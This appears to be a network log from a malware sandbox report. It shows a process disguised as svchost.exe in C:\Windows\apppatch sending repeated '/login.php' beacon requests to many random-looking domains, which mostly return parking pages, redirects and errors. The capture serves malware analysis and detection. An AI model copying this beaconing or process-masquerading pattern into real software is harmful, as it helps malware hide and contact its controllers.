                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww16.vofycot.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.2338786
Nov 11, 2024 18:50:40.681955099 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S2Ix9gORnb5udIjvNgijYhgIJg4FyOEyIO647bNfu3cE5HsJSqwl+T52hQG4kUU9uPd+8xG1mN+CdBHIvJY5TA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S2Ix9gORnb5udIjvNgijYhgIJg4FyOEyIO647bNfu3cE5HsJSqwl+T52hQG4kUU9uPd+8xG1mN+CdBHIvJY5TA==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.6  49808        199.59.243.227  80                1112  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:50:40.259344101 CET  350  OUT  GET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww25.lyxynyx.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.3564880
Nov 11, 2024 18:50:40.685638905 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1230
                                                                                                                                                                                                                  x-request-id: b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TrgVLBvDmnzLPmfqH882isUMTYn0SzQhgqyQnN29uEEWWmo+h4WOccKkDJPzu96Zw/60DyrPlMXbw6b86P+b2w==
                                                                                                                                                                                                                  set-cookie: parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b; expires=Mon, 11 Nov 2024 18:05:40 GMT; path=/
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TrgVLBvDmnzLPmfqH882isUMTYn0SzQhgqyQnN29uEEWWmo+h4WOccKkDJPzu96Zw/60DyrPlMXbw6b86P+b2w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:50:40.685791016 CET | 664 | IN
                                                                                                                                                                                                                  Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjA5N2VhY2EtZWExYS00YThkLThiZWUtYTI5NjhjN2ViYTdiIiwicGFnZV90aW1lIjoxNzMxMzQ3NDQwLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49821 | 64.225.91.73 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:41.513499022 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyhyg.com
Nov 11, 2024 18:50:42.059688091 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:41 GMT
                                                                                                                                                                                                                  content-type: text/html
                                                                                                                                                                                                                  content-length: 593
                                                                                                                                                                                                                  last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                                  etag: "63f68860-251"
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49822 | 72.52.179.174 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:41.718429089 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49829 | 72.52.179.174 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:42.214312077 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 53361 | 52.34.198.229 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:44.812176943 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lygyvuj.com
Nov 11, 2024 18:50:45.502927065 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:45 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=b255da44d539af88139917f5305c831f|66.23.206.109|1731347445|1731347445|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 53377 | 44.221.84.105 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:46.945445061 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyhiz.com
Nov 11, 2024 18:50:47.379331112 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:47 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=c2814cfe50fffab8ec877b7f0a2e5795|66.23.206.109|1731347447|1731347447|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 53397 | 199.59.243.227 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.356956005 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:50:48.810888052 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 409f526f-1eb8-4a43-8c10-fa625dad446a
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:05:48 GMT
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:50:48.810992002 CET | 520 | IN
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDQ4LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 54642 | 23.253.46.64 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.371059895 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:50:48.826980114 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:43 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:50:48.826992035 CET | 169 | IN
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 54643 | 85.17.31.122 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.385489941 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 54644 | 75.2.71.199 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.389873028 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Nov 11, 2024 18:50:48.845155001 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
Connection: close
Location: https://puzylyp.com/login.php
Server: Caddy
Date: Mon, 11 Nov 2024 17:50:48 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 54646 | 85.17.31.122 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.867609978 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 54648 | 23.253.46.64 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:48.890130043 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyqah.com
Nov 11, 2024 18:50:49.343508005 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:50:43 GMT
Content-Length: 1245
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:50:49.343521118 CET | 169 | IN
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 54724 | 103.224.212.210 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:58.165591002 CET | 277 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyxynyx.com
Cookie: __tad=1731347439.3564880
Nov 11, 2024 18:50:58.867031097 CET | 244 | IN | HTTP/1.1 302 Found
date: Mon, 11 Nov 2024 17:50:58 GMT
server: Apache
location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0450-586c-82c6-824410e64c84
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 54725 | 103.224.182.252 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:58.251365900 CET | 277 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofycot.com
Cookie: __tad=1731347439.2338786
Nov 11, 2024 18:50:58.867954969 CET | 242 | IN | HTTP/1.1 302 Found
date: Mon, 11 Nov 2024 17:50:58 GMT
server: Apache
location: http://ww16.vofycot.com/login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 54729 | 64.190.63.136 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:58.877432108 CET | 348 | OUT | GET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww16.vofycot.com
Connection: Keep-Alive
Cookie: __tad=1731347439.2338786
Nov 11, 2024 18:50:59.519500971 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:50:59 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2EcsfEHphYAq2SyCNUwqRKkIKLHg5prEnR1flzigjCDG+d1Dlm8tRlTPKkk5I4YSi6F4MaKhATkoCwBOfqG5aw==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:59 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-6sm9t
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2EcsfEHphYAq2SyCNUwqRKkIKLHg5prEnR1flzigjCDG+d1Dlm8tRlTPKkk5I4YSi6F4MaKhATkoCwBOfqG5aw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519627094 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                                  Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519639969 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                                  Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520042896 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                                  Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520056963 CET1236INData Raw: 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73
                                                                                                                                                                                                                  Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520466089 CET1236INData Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e
                                                                                                                                                                                                                  Data Ascii: gin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520478964 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75
